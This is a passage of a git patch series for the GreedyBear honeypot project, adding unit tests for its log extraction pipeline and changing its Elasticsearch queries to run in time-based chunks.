+Tests for ExtractionStrategyFactory.
+"""
+
+from unittest.mock import MagicMock
+
+from tests import ExtractionTestCase
+
+
+class TestExtractionStrategyFactory(ExtractionTestCase):
+ """Tests for ExtractionStrategyFactory."""
+
+ def test_factory_creates_cowrie_strategy_for_cowrie(self):
+ """Factory should return CowrieExtractionStrategy for 'Cowrie' honeypot."""
+ from greedybear.cronjobs.extraction.strategies import CowrieExtractionStrategy
+ from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+ factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+ strategy = factory.get_strategy("Cowrie")
+
+ self.assertIsInstance(strategy, CowrieExtractionStrategy)
+
+ def test_factory_creates_log4pot_strategy_for_log4pot(self):
+ """Factory should return Log4potExtractionStrategy for 'Log4pot' honeypot."""
+ from greedybear.cronjobs.extraction.strategies import Log4potExtractionStrategy
+ from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+ factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+ strategy = factory.get_strategy("Log4pot")
+
+ self.assertIsInstance(strategy, Log4potExtractionStrategy)
+
+ def test_factory_creates_generic_strategy_for_unknown(self):
+ """Factory should return GenericExtractionStrategy for unknown honeypots."""
+ from greedybear.cronjobs.extraction.strategies import GenericExtractionStrategy
+ from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+ factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+ strategy = factory.get_strategy("UnknownHoneypot")
+
+ self.assertIsInstance(strategy, GenericExtractionStrategy)
+ self.assertEqual(strategy.honeypot, "UnknownHoneypot")
+
+ def test_factory_case_sensitive_honeypot_names(self):
+ """Factory honeypot matching should be case-sensitive."""
+ from greedybear.cronjobs.extraction.strategies import GenericExtractionStrategy
+ from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+ factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+
+ # 'cowrie' (lowercase) should get generic strategy, not Cowrie strategy
+ strategy = factory.get_strategy("cowrie")
+ self.assertIsInstance(strategy, GenericExtractionStrategy)
+
+ # 'COWRIE' (uppercase) should also get generic strategy
+ strategy = factory.get_strategy("COWRIE")
+ self.assertIsInstance(strategy, GenericExtractionStrategy)
+
+ def test_factory_strategies_have_correct_honeypot_name(self):
+ """Factory-created strategies should have the correct honeypot name."""
+ from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+ factory = ExtractionStrategyFactory(MagicMock(), MagicMock())
+
+ cowrie_strategy = factory.get_strategy("Cowrie")
+ self.assertEqual(cowrie_strategy.honeypot, "Cowrie")
+
+ log4pot_strategy = factory.get_strategy("Log4pot")
+ self.assertEqual(log4pot_strategy.honeypot, "Log4pot")
+
+ generic_strategy = factory.get_strategy("Heralding")
+ self.assertEqual(generic_strategy.honeypot, "Heralding")
+
+ def test_factory_passes_repositories_to_strategies(self):
+ """Factory should pass repositories to created strategies."""
+ from greedybear.cronjobs.extraction.strategies.factory import ExtractionStrategyFactory
+
+ mock_ioc_repo = MagicMock()
+ mock_sensor_repo = MagicMock()
+
+ factory = ExtractionStrategyFactory(mock_ioc_repo, mock_sensor_repo)
+ strategy = factory.get_strategy("Cowrie")
+
+ self.assertEqual(strategy.ioc_repo, mock_ioc_repo)
+ self.assertEqual(strategy.sensor_repo, mock_sensor_repo)
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py b/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
new file mode 100644
index 00000000..18eed9b3
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_grouping.py
@@ -0,0 +1,236 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+Tests for hit filtering, grouping, and sensor extraction in ExtractionPipeline.
+"""
+
+from unittest.mock import MagicMock, patch
+
+from tests import ExtractionTestCase, MockElasticHit
+
+
+class ExtractionPipelineTestCase(ExtractionTestCase):
+ """Base test case for extraction pipeline tests."""
+
+ def _create_pipeline_with_mocks(self):
+ """Helper to create a pipeline with mocked dependencies."""
+ with (
+ patch("greedybear.cronjobs.extraction.pipeline.SensorRepository"),
+ patch("greedybear.cronjobs.extraction.pipeline.IocRepository"),
+ patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository"),
+ ):
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ return pipeline
+
+
+class TestHitFiltering(ExtractionPipelineTestCase):
+ """Tests for hit filtering logic in execute()."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_skips_hits_without_src_ip(self, mock_factory, mock_scores):
+ """Hits without src_ip should be skipped."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"type": "Cowrie"}), # missing src_ip
+ MockElasticHit({"src_ip": "", "type": "Cowrie"}), # empty src_ip
+ MockElasticHit({"src_ip": " ", "type": "Cowrie"}), # whitespace-only src_ip
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 0)
+ mock_factory.return_value.get_strategy.assert_not_called()
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_skips_hits_without_type(self, mock_factory, mock_scores):
+ """Hits without type (honeypot) should be skipped."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4"}), # missing type
+ MockElasticHit({"src_ip": "1.2.3.4", "type": ""}), # empty type
+ MockElasticHit({"src_ip": "1.2.3.4", "type": " "}), # whitespace-only type
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 0)
+ mock_factory.return_value.get_strategy.assert_not_called()
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_handles_empty_search_result(self, mock_factory, mock_scores):
+ """Should handle empty Elasticsearch response gracefully."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = []
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline.execute()
+
+ self.assertEqual(result, 0)
+ mock_factory.return_value.get_strategy.assert_not_called()
+ mock_scores.return_value.score_only.assert_not_called()
+
+
+class TestSensorExtraction(ExtractionPipelineTestCase):
+ """Tests for sensor extraction from hits."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+ @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 10)
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_extracts_sensor_from_hits(self, mock_factory, mock_scores):
+ """
+ Should extract and register sensors from t-pot_ip_ext field.
+ Also verifies correct time window is passed to search().
+ """
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie", "t-pot_ip_ext": "10.0.0.1"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = False # Skip strategy for this test
+
+ pipeline.execute()
+
+ pipeline.sensor_repo.add_sensor.assert_called_once_with("10.0.0.1")
+ pipeline.elastic_repo.search.assert_called_once_with(10)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_sensor_not_extracted_for_invalid_hits(self, mock_factory, mock_scores):
+ """
+ Sensors should NOT be extracted for hits that fail validation.
+ Even if t-pot_ip_ext is present, missing required fields should skip sensor extraction.
+ """
+ pipeline = self._create_pipeline_with_mocks()
+
+ # Hit with sensor but missing type
+ hits = [
+ MockElasticHit(
+ {
+ "src_ip": "192.168.1.1",
+ "t-pot_ip_ext": "10.0.0.99",
+ # Missing 'type' field
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ pipeline.execute()
+
+ # Sensor should NOT be extracted for invalid hits (missing type)
+ pipeline.sensor_repo.add_sensor.assert_not_called()
+
+
+class TestHitGrouping(ExtractionPipelineTestCase):
+ """Tests for hit grouping by honeypot type."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_groups_hits_by_honeypot_type(self, mock_factory, mock_scores):
+ """Hits should be grouped by honeypot type before extraction."""
+ pipeline = self._create_pipeline_with_mocks()
+ pipeline.elastic_repo.search.return_value = [
+ MockElasticHit({"src_ip": "1.2.3.4", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "5.6.7.8", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "9.10.11.12", "type": "Log4pot"}),
+ ]
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = []
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ pipeline.execute()
+
+ # Should be called for both honeypot types
+ self.assertEqual(mock_factory.return_value.get_strategy.call_count, 2)
+
+ # Verify strategy is called with correct honeypot types
+ calls = mock_factory.return_value.get_strategy.call_args_list
+ honeypot_names = {call[0][0] for call in calls}
+ self.assertEqual(honeypot_names, {"Cowrie", "Log4pot"})
+
+ # Verify extract_from_hits is called twice
+ self.assertEqual(mock_strategy.extract_from_hits.call_count, 2)
+
+ # Verify each strategy received correct number of hits
+ extraction_calls = mock_strategy.extract_from_hits.call_args_list
+ hits_counts = sorted([len(call[0][0]) for call in extraction_calls])
+ self.assertEqual(hits_counts, [1, 2]) # 1 Log4pot hit, 2 Cowrie hits
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_duplicate_honeypot_hits_grouped(self, mock_factory, mock_scores):
+ """Multiple hits from same honeypot type are grouped together."""
+ pipeline = self._create_pipeline_with_mocks()
+
+ hits = [
+ MockElasticHit({"src_ip": "1.1.1.1", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "2.2.2.2", "type": "Cowrie"}),
+ MockElasticHit({"src_ip": "3.3.3.3", "type": "Cowrie"}),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+ pipeline.ioc_repo.is_ready_for_extraction.return_value = True
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = [self._create_mock_ioc("1.1.1.1")]
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ pipeline.execute()
+
+ # Strategy should be called only ONCE with all 3 hits grouped
+ mock_factory.return_value.get_strategy.assert_called_once_with("Cowrie")
+ self.assertEqual(mock_strategy.extract_from_hits.call_count, 1)
+
+ # Verify all 3 hits were passed together
+ call_args = mock_strategy.extract_from_hits.call_args[0][0]
+ self.assertEqual(len(call_args), 3)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.UpdateScores")
+ @patch("greedybear.cronjobs.extraction.pipeline.ExtractionStrategyFactory")
+ def test_honeypot_skipped_when_not_ready(self, mock_factory, mock_scores):
+ """Honeypots not ready for extraction should be skipped."""
+ pipeline = self._create_pipeline_with_mocks()
+
+ hits = [
+ MockElasticHit(
+ {
+ "src_ip": "1.2.3.4",
+ "type": "DisabledHoneypot",
+ "t-pot_ip_ext": "10.0.0.1",
+ }
+ ),
+ MockElasticHit(
+ {
+ "src_ip": "5.6.7.8",
+ "type": "EnabledHoneypot",
+ "t-pot_ip_ext": "10.0.0.2",
+ }
+ ),
+ ]
+ pipeline.elastic_repo.search.return_value = hits
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ # First honeypot disabled, second enabled
+ pipeline.ioc_repo.is_ready_for_extraction.side_effect = [False, True]
+
+ mock_strategy = MagicMock()
+ mock_strategy.ioc_records = [self._create_mock_ioc("5.6.7.8")]
+ mock_factory.return_value.get_strategy.return_value = mock_strategy
+
+ result = pipeline.execute()
+
+ # Should only process the enabled honeypot
+ self.assertEqual(result, 1)
+ # Factory should only be called once (for EnabledHoneypot)
+ mock_factory.return_value.get_strategy.assert_called_once_with("EnabledHoneypot")
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_init.py b/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
new file mode 100644
index 00000000..18e81e60
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_init.py
@@ -0,0 +1,80 @@
+# This file is a part of GreedyBear https://github.com/honeynet/GreedyBear
+# See the file 'LICENSE' for copying permission.
+"""
+Tests for ExtractionPipeline initialization and time window calculation.
+"""
+
+from unittest.mock import patch
+
+from tests import ExtractionTestCase
+
+
+class TestExtractionPipelineInit(ExtractionTestCase):
+ """Tests for ExtractionPipeline initialization."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+ def test_initializes_repositories(self, mock_elastic, mock_ioc, mock_sensor):
+ """Pipeline should initialize all required repositories."""
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+
+ mock_elastic.assert_called_once()
+ mock_ioc.assert_called_once()
+ mock_sensor.assert_called_once()
+ self.assertIsNotNone(pipeline.log)
+
+
+class TestMinutesBackToLookup(ExtractionTestCase):
+ """Tests for the _minutes_back_to_lookup property."""
+
+ @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+ @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+ @patch("greedybear.cronjobs.extraction.pipeline.INITIAL_EXTRACTION_TIMESPAN", 120)
+ @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+ def test_returns_initial_timespan_when_empty(self, mock_elastic, mock_ioc, mock_sensor):
+ """Should return INITIAL_EXTRACTION_TIMESPAN on first run (empty DB)."""
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ pipeline.ioc_repo.is_empty.return_value = True
+
+ result = pipeline._minutes_back_to_lookup
+
+ self.assertEqual(result, 120)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", False)
+ @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+ @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+ def test_returns_extraction_interval_when_not_empty(self, mock_elastic, mock_ioc, mock_sensor):
+ """Should return EXTRACTION_INTERVAL for subsequent runs."""
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline._minutes_back_to_lookup
+
+ self.assertEqual(result, 5)
+
+ @patch("greedybear.cronjobs.extraction.pipeline.LEGACY_EXTRACTION", True)
+ @patch("greedybear.cronjobs.extraction.pipeline.EXTRACTION_INTERVAL", 5)
+ @patch("greedybear.cronjobs.extraction.pipeline.SensorRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.IocRepository")
+ @patch("greedybear.cronjobs.extraction.pipeline.ElasticRepository")
+ def test_returns_11_for_legacy_extraction(self, mock_elastic, mock_ioc, mock_sensor):
+ """Should return 11 when LEGACY_EXTRACTION is enabled."""
+ from greedybear.cronjobs.extraction.pipeline import ExtractionPipeline
+
+ pipeline = ExtractionPipeline()
+ pipeline.ioc_repo.is_empty.return_value = False
+
+ result = pipeline._minutes_back_to_lookup
+
+ self.assertEqual(result, 11)
From 3e437c9b0554b19c4d95402310f2975332cf177a Mon Sep 17 00:00:00 2001
From: tim <46972822+regulartim@users.noreply.github.com>
Date: Thu, 29 Jan 2026 18:11:39 +0100
Subject: [PATCH 72/75] Reduce memory usage by chunking Elasticsearch queries.
Closes #630 (#750)
* remove legacy extraction
* change extraction logic to use time-based chunks
* remove LEGACY_EXTRACTION references in tests
* adapt tests
* fix format
* add test for chunking
---
docker/env_file_template | 2 -
greedybear/celery.py | 4 +-
greedybear/cronjobs/extraction/pipeline.py | 81 +++----
greedybear/cronjobs/repositories/elastic.py | 88 +++----
greedybear/settings.py | 1 -
.../cronjobs/test_extraction_pipeline_e2e.py | 22 +-
.../test_extraction_pipeline_edge_cases.py | 4 +-
.../test_extraction_pipeline_grouping.py | 140 ++++++++++--
.../cronjobs/test_extraction_pipeline_init.py | 18 --
tests/test_elastic_repository.py | 216 +++++++++++++-----
10 files changed, 364 insertions(+), 212 deletions(-)
diff --git a/docker/env_file_template b/docker/env_file_template
index 890f102d..b8363a06 100644
--- a/docker/env_file_template
+++ b/docker/env_file_template
@@ -46,8 +46,6 @@ MOCK_CONNECTIONS=False
# True for public deployment, False for internal deployment
PUBLIC_DEPLOYMENT=False
-# Set True for use with TPot instances prior to version 24.04
-LEGACY_EXTRACTION=False
# Interval for the honeypot data extraction in minutes (only choose divisors of 60)
EXTRACTION_INTERVAL=10
diff --git a/greedybear/celery.py b/greedybear/celery.py
index db1500e2..53b3c383 100644
--- a/greedybear/celery.py
+++ b/greedybear/celery.py
@@ -9,7 +9,7 @@
from django.conf import settings
from kombu import Exchange, Queue
-from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
+from greedybear.settings import EXTRACTION_INTERVAL
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "greedybear.settings")
@@ -56,7 +56,7 @@ def setup_loggers(*args, **kwargs):
dictConfig(settings.LOGGING)
-hp_extraction_interval = 10 if LEGACY_EXTRACTION else EXTRACTION_INTERVAL
+hp_extraction_interval = EXTRACTION_INTERVAL
app.conf.beat_schedule = {
# every 10 minutes or according to EXTRACTION_INTERVAL
"extract_all": {
diff --git a/greedybear/cronjobs/extraction/pipeline.py b/greedybear/cronjobs/extraction/pipeline.py
index 189140dc..9874cb5e 100644
--- a/greedybear/cronjobs/extraction/pipeline.py
+++ b/greedybear/cronjobs/extraction/pipeline.py
@@ -11,7 +11,6 @@
from greedybear.settings import (
EXTRACTION_INTERVAL,
INITIAL_EXTRACTION_TIMESPAN,
- LEGACY_EXTRACTION,
)
@@ -40,57 +39,61 @@ def _minutes_back_to_lookup(self) -> int:
"""
if self.ioc_repo.is_empty():
return INITIAL_EXTRACTION_TIMESPAN
- return 11 if LEGACY_EXTRACTION else EXTRACTION_INTERVAL
+ return EXTRACTION_INTERVAL
def execute(self) -> int:
"""
Execute the extraction pipeline.
Performs the following steps:
- 1. Search Elasticsearch for honeypot log entries
- 2. Group hits by honeypot type and extract sensors
+ 1. Search Elasticsearch for honeypot log entries in chunks
+ 2. For each chunk, group hits by honeypot type and extract sensors
3. Apply honeypot-specific extraction strategies
4. Update IOC scores
Returns:
Number of IOC records processed.
"""
- # 1. Search
+ ioc_record_count = 0
+ factory = ExtractionStrategyFactory(self.ioc_repo, self.sensor_repo)
+
+ # 1. Search in chunks
self.log.info("Getting honeypot hits from Elasticsearch")
- search_result = self.elastic_repo.search(self._minutes_back_to_lookup)
- hits_by_honeypot = defaultdict(list)
+ for chunk in self.elastic_repo.search(self._minutes_back_to_lookup):
+ ioc_records = []
+ hits_by_honeypot = defaultdict(list)
- # 2. Group by honeypot
- self.log.info("Grouping hits by honeypot type")
- for hit in search_result:
- # skip hits with non-existing or empty sources
- if "src_ip" not in hit or not hit["src_ip"].strip():
- continue
- # skip hits with non-existing or empty types (=honeypots)
- if "type" not in hit or not hit["type"].strip():
- continue
- # extract sensor
- if "t-pot_ip_ext" in hit:
- self.sensor_repo.add_sensor(hit["t-pot_ip_ext"])
- hits_by_honeypot[hit["type"]].append(hit.to_dict())
+ # 2. Group by honeypot
+ self.log.info("Grouping hits by honeypot type")
+ for hit in chunk:
+ # skip hits with non-existing or empty sources
+ if "src_ip" not in hit or not hit["src_ip"].strip():
+ continue
+ # skip hits with non-existing or empty types (=honeypots)
+ if "type" not in hit or not hit["type"].strip():
+ continue
+ # extract sensor
+ if "t-pot_ip_ext" in hit:
+ self.sensor_repo.add_sensor(hit["t-pot_ip_ext"])
+ hits_by_honeypot[hit["type"]].append(hit.to_dict())
- # 3. Extract using strategies
- ioc_records = []
- factory = ExtractionStrategyFactory(self.ioc_repo, self.sensor_repo)
- for honeypot, hits in sorted(hits_by_honeypot.items()):
- if not self.ioc_repo.is_ready_for_extraction(honeypot):
- self.log.info(f"Skipping honeypot {honeypot}")
- continue
- self.log.info(f"Extracting hits from honeypot {honeypot}")
- strategy = factory.get_strategy(honeypot)
- try:
- strategy.extract_from_hits(hits)
- ioc_records += strategy.ioc_records
- except Exception as exc:
- self.log.error(f"Extraction failed for honeypot {honeypot}: {exc}")
+ # 3. Extract using strategies
+ for honeypot, hits in sorted(hits_by_honeypot.items()):
+ if not self.ioc_repo.is_ready_for_extraction(honeypot):
+ self.log.info(f"Skipping honeypot {honeypot}")
+ continue
+ self.log.info(f"Extracting hits from honeypot {honeypot}")
+ strategy = factory.get_strategy(honeypot)
+ try:
+ strategy.extract_from_hits(hits)
+ ioc_records += strategy.ioc_records
+ except Exception as exc:
+ self.log.error(f"Extraction failed for honeypot {honeypot}: {exc}")
+
+ # 4. Update scores
+ self.log.info("Updating scores")
+ if ioc_records:
+ UpdateScores().score_only(ioc_records)
+ ioc_record_count += len(ioc_records)
- # 4. Update scores
- self.log.info("Updating scores")
- if ioc_records:
- UpdateScores().score_only(ioc_records)
- return len(ioc_records)
+ return ioc_record_count
diff --git a/greedybear/cronjobs/repositories/elastic.py b/greedybear/cronjobs/repositories/elastic.py
index 6895472d..0ca0716f 100644
--- a/greedybear/cronjobs/repositories/elastic.py
+++ b/greedybear/cronjobs/repositories/elastic.py
@@ -1,21 +1,20 @@
import logging
+from collections.abc import Iterator
from datetime import datetime, timedelta
from django.conf import settings
from elasticsearch.dsl import Q, Search
from greedybear.consts import REQUIRED_FIELDS
-from greedybear.settings import EXTRACTION_INTERVAL, LEGACY_EXTRACTION
+from greedybear.settings import EXTRACTION_INTERVAL
class ElasticRepository:
"""
Repository for querying honeypot log data from a T-Pot Elasticsearch instance.
- Provides a cached search interface for retrieving log entries within
+ Provides a chunked search interface for retrieving log entries within
a specified time window from logstash indices.
-
- This class is intended for individual extraction runs, so the cache never clears.
"""
class ElasticServerDownError(Exception):
@@ -24,10 +23,9 @@ class ElasticServerDownError(Exception):
pass
def __init__(self):
- """Initialize the repository with an Elasticsearch client and empty cache."""
+ """Initialize the repository with an Elasticsearch client."""
self.log = logging.getLogger(f"{__name__}.{self.__class__.__name__}")
self.elastic_client = settings.ELASTIC_CLIENT
- self.search_cache = {}
def has_honeypot_been_hit(self, minutes_back_to_lookup: int, honeypot_name: str) -> bool:
"""
@@ -36,84 +34,50 @@ def has_honeypot_been_hit(self, minutes_back_to_lookup: int, honeypot_name: str)
Args:
minutes_back_to_lookup: Number of minutes to look back from the current
time when searching for honeypot hits.
- honeypot_name: The name/type of the honeypot to check for hits.
+ honeypot_name: The name/type of the honeypot to check for hits.
Returns:
True if at least one hit was recorded for the specified honeypot within
the time window, False otherwise.
"""
search = Search(using=self.elastic_client, index="logstash-*")
- q = self._standard_query(minutes_back_to_lookup)
+ window_start, window_end = get_time_window(datetime.now(), minutes_back_to_lookup)
+ q = Q("range", **{"@timestamp": {"gte": window_start, "lt": window_end}})
search = search.query(q)
search = search.filter("term", **{"type.keyword": honeypot_name})
return search.count() > 0
- def search(self, minutes_back_to_lookup: int) -> list:
+ def search(self, minutes_back_to_lookup: int) -> Iterator[list]:
"""
- Search for log entries within a specified time window.
-
- Returns cached results if available for the given lookback period.
- Uses legacy or modern query format based on LEGACY_EXTRACTION setting.
+ Search for log entries within a specified time window, yielding results
+ in chunks of at most EXTRACTION_INTERVAL minutes.
Args:
minutes_back_to_lookup: Number of minutes to look back from the current time.
- Returns:
- list: Log entries sorted by @timestamp, containing only REQUIRED_FIELDS.
+ Yields:
+ list: Log entries sorted by @timestamp for each chunk, containing only REQUIRED_FIELDS.
Raises:
ElasticServerDownError: If Elasticsearch is unreachable.
"""
- if minutes_back_to_lookup in self.search_cache:
- self.log.debug("fetching elastic search result from cache")
- return self.search_cache[minutes_back_to_lookup]
-
self._healthcheck()
- search = Search(using=self.elastic_client, index="logstash-*")
self.log.debug(f"minutes_back_to_lookup: {minutes_back_to_lookup}")
- if LEGACY_EXTRACTION:
- self.log.debug("querying elastic using legacy method")
- gte_date = f"now-{minutes_back_to_lookup}m/m"
- q = Q(
- "bool",
- should=[
- Q("range", timestamp={"gte": gte_date, "lte": "now/m"}),
- Q("range", end_time={"gte": gte_date, "lte": "now/m"}),
- Q("range", **{"@timestamp": {"gte": gte_date, "lte": "now/m"}}),
- ],
- minimum_should_match=1,
- )
- else:
- q = self._standard_query(minutes_back_to_lookup)
-
- search = search.query(q)
- search.source(REQUIRED_FIELDS)
- result = list(search.scan())
- self.log.debug(f"found {len(result)} hits")
-
- result.sort(key=lambda hit: hit["@timestamp"])
- self.search_cache[minutes_back_to_lookup] = result
- return result
-
- def _standard_query(self, minutes_back_to_lookup: int) -> Q:
- """
- Builds an Elasticsearch query that filters documents based on their
- @timestamp field, searching backwards from the current time for the
- specified number of minutes.
-
- Args:
- minutes_back_to_lookup: Number of minutes to look back from the
- current time. Defines the size of the time window to search.
-
- Returns:
- Q: An elasticsearch-dsl Query object with a range filter on the
- @timestamp field. The range spans from (now - minutes_back_to_lookup)
- to now.
- """
- self.log.debug("querying elastic using standard method")
window_start, window_end = get_time_window(datetime.now(), minutes_back_to_lookup)
- self.log.debug(f"time window: {window_start} - {window_end}")
- return Q("range", **{"@timestamp": {"gte": window_start, "lt": window_end}})
+ chunk_start = window_start
+ while chunk_start < window_end:
+ self.log.debug("querying elastic")
+ chunk_end = min(chunk_start + timedelta(minutes=EXTRACTION_INTERVAL), window_end)
+ self.log.debug(f"time window: {chunk_start} - {chunk_end}")
+ search = Search(using=self.elastic_client, index="logstash-*")
+ q = Q("range", **{"@timestamp": {"gte": chunk_start, "lt": chunk_end}})
+ search = search.query(q)
+ search.source(REQUIRED_FIELDS)
+ result = list(search.scan())
+ self.log.debug(f"found {len(result)} hits")
+ result.sort(key=lambda hit: hit["@timestamp"])
+ yield result
+ chunk_start = chunk_end
def _healthcheck(self):
"""
diff --git a/greedybear/settings.py b/greedybear/settings.py
index e07cdfdf..d197280f 100644
--- a/greedybear/settings.py
+++ b/greedybear/settings.py
@@ -408,7 +408,6 @@
EMAIL_USE_SSL = os.environ.get("EMAIL_USE_SSL", "False") == "True"
-LEGACY_EXTRACTION = os.environ.get("LEGACY_EXTRACTION", "False") == "True"
EXTRACTION_INTERVAL = int(os.environ.get("EXTRACTION_INTERVAL", 10))
INITIAL_EXTRACTION_TIMESPAN = int(os.environ.get("INITIAL_EXTRACTION_TIMESPAN", 60 * 24 * 3)) # 3 days
CLUSTER_COWRIE_COMMAND_SEQUENCES = os.environ.get("CLUSTER_COWRIE_COMMAND_SEQUENCES", "False") == "True"
diff --git a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
index c85b264d..d37e9dd1 100644
--- a/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
+++ b/tests/greedybear/cronjobs/test_extraction_pipeline_e2e.py
@@ -37,7 +37,7 @@ def test_cowrie_extracts_scanner_ioc(self, mock_session_repo, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = cowrie_hits
+ pipeline.elastic_repo.search.return_value = [cowrie_hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None # New IOC
@@ -75,7 +75,7 @@ def test_cowrie_extracts_login_credentials(self, mock_session_repo, mock_scores)
}
),
]
- pipeline.elastic_repo.search.return_value = cowrie_hits
+ pipeline.elastic_repo.search.return_value = [cowrie_hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -111,7 +111,7 @@ def test_log4pot_extracts_exploit_ioc(self, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = log4pot_hits
+ pipeline.elastic_repo.search.return_value = [log4pot_hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -141,7 +141,7 @@ def test_log4pot_non_exploit_skipped(self, mock_scores):
}
),
]
- pipeline.elastic_repo.search.return_value = log4pot_hits
+ pipeline.elastic_repo.search.return_value = [log4pot_hits]
pipeline.ioc_repo.is_empty.return_value = False
pipeline.ioc_repo.is_ready_for_extraction.return_value = True
pipeline.ioc_repo.get_ioc_by_name.return_value = None
@@ -176,7 +176,7 @@ def test_unknown_honeypot_uses_generic_strategy(self, mock_scores):
}
),
]
